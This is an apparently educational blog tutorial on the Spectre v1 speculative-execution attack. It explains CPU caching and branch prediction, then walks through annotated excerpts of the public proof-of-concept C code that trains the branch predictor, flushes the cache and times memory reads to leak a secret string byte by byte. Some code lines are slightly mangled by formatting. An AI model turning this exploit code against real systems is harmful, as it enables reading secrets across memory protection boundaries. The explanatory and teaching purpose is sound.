Resources

Cache

We all know that it takes much time when CPU accessing memory considering CPU caculation speed. In order to reduce the large amount of time consumption caused by CPU access, cache arised.

This article will not introduce the exact structure of memory, if you get interested in it, please refer to this.

Let’s assume that our computer will do this operation:

1	tmp = Array[x];

CPU is trying to get Array[x] from cache first instead of memory, and here are two situations:

Array[x] is in the cache, so CPU gets its value.
Array[x] is not in the cache, so CPU needs to access memory to get its value, which will cost more time.

Branch Prediction and Speculative Execution

Modern CPUs are multi-core and multi-threaded, that is, support parallel execution of instructions. Therefore, if there is a branch jump condition that is related to a data, but the cache does not hit the data and can only perform the memory fetch operation, the program will not serially block to wait for the end of the memory fetch to perform the branch jump, but will attempt to perform branch prediction and speculative execution. When the memory data read by the CPU comes back, the CPU then confirms according to the content of the data and the logic of the branch condition whether its speculative execution is valid, and if it is invalid, the calculation result is discarded and restored to the previous state. If effective, continue execution, which greatly improves the efficiency of the CPU.

But here is the thing: If the result of speculative execution is discarded, the code executed during speculative execution may still affect the CPU cache. When the CPU is restoring the state, the cache will not be restored, and the CPU will only restore the state of the related registers.

Let’s look at this demo:

// a1_size and a2 are not in the cache
if (idx < a1_size) {
    tmp = a2[a1[idx]];
}

In the demo above, CPU knows that it is a conditional judgment, and because a1_size is not in the cache, CPU needs to access memory to get the value.

Then, CPU saves a checkpoint, and executes instructions behind speculatively, which means that CPU treats idx as a variable that is smaller than a1_size. If idx is large enough, it will cause OOB reading, and a1[idx] will be treated as an index of a2 and CPU will access memory based on a1[idx]. Finally accessed data in a2 will be submitted from the memory to the CPU cache.

When a1_size is read from the memory, the CPU checks the branch condition again, and it finds that it does not meet the condition and cannot continue execution. So it will discard the current calculation result, then restore to the previous state, and continue to execute the code of another branch. But the data in a2 has been submitted to the CPU cache.

The demo may be a little bit different from real PoC, but it’s easier for us to understand.

How does PoC work?

The content we want to leak is defined:

1	char* secret = "The Magic Words are Squeamish Ossifrage.";

malicious_x is the shift of secret relative to array1:

1	size_t malicious_x = (size_t)(secret - (char )array1); / default for malicious_x */

1 2	int score[2], len = strlen(secret); uint8_t value[2];

value[0] stores the character with the highest hit (the most likely character)
value[1] stores the character with the second highest hit
score[0] stores the number of hits with the highest character
score[1] stores the number of hits for the second highest character

Guess the data byte by byte:

while (--len >= 0)
{
	printf("Reading at malicious_x = %p... ", (void *)malicious_x);
	readMemoryByte(malicious_x++, value, score);
	printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
	printf("0x%02X='%c' score=%d ", value[0],
		       (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
	if (score[1] > 0)
		printf("(second best: 0x%02X='%c' score=%d)", value[1],
				   (value[1] > 31 && value[1] < 127 ? value[1] : '?'),
				   score[1]);
	printf("\n");
}

Let’s look inside readMemoryByte to see what happens.

In this function, we will try 1000 times to guess the answer, and break if the confidence condition is met:

1 2	if (results[j] >= (2 * results[k] + 5) \|\| (results[j] == 2 && results[k] == 0)) break; /* Clear success if best is > 2runner-up + 5 or 2/0) /

At the beginning, we need to flush array2 from cache:

1 2	for (i = 0; i < 256; i++) _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */

Then there is another loop of 30 times. In this loop, it can be regarded as 5 6-cycles. The first 5 cycles are used to train the CPU, and then the conditional branch prediction is triggered for the last:

/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--)
{
	_mm_clflush(&array1_size);
	for (volatile int z = 0; z < 100; z++)
	{
	} /* Delay (can also mfence) */

	/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
	/* Avoid jumps in case those tip off the branch predictor */
	x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
	x = (x | (x >> 16)); /* Set x=-1 if j%6=0, else x=0 */
	x = training_x ^ (x & (malicious_x ^ training_x));

    /*
        j % 6 == 0 -> x = malicious_x
        j % 6 != 0 -> x = training_x
    */

	/* Call the victim! */
	victim_function(x);
}

After these 30 cycles, through side-channel attacks, the access time of each item in array2 is counted, and the ASCII value of the string is deduced:

/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++)
{
	mix_i = ((i * 167) + 13) & 255;
	addr = &array2[mix_i * 512];
	time1 = __rdtscp(&junk); /* READ TIMER */
	junk = *addr; /* MEMORY ACCESS TO TIME */
	time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
	if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
		results[mix_i]++; /* cache hit - add +1 to score for this value */
}

At last, we need to find the highest and second highest results:

/* Locate highest & second-highest results results tallies in j/k */
j = k = -1;
for (i = 0; i < 256; i++)
{
	if (j < 0 || results[i] >= results[j])
	{
		k = j;
		j = i;
	}
	else if (k < 0 || results[i] >= results[k])
	{
		k = i;
	}
}

As for victim_function, it’s similiar to the demo mentioned above:

uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x)
{
	if (x < array1_size) // bound check
	{
		temp &= array2[array1[x] * 512];
	}
}

The first 5 cycles are essentially a kind of training for the CPU. Therefore, when the branch judgment of the sixth cycle causes speculative execution, the CPU is more inclined to choose the “no cross-border” branch, and therefore speculative execution. After the boundary check fails, the speculative execution result is discarded, but the value of array2[array1[x] * 512] has been stored in the cache. When reading the content of array2[mix_t * 512], if you find that the reading time is abnormally fast, you can determine that mix_t is the answer.

Postscript

CPU Spectre is a novel cache-level attack method. However, this attack method also has its limitations, that is, the attacker needs to have a greater degree of freedom in the entire memory allocation and process control, and it is difficult to find such an exploit at the application level.

Spectre and Cache

Resources

Cache

Branch Prediction and Speculative Execution

How does PoC work?

Postscript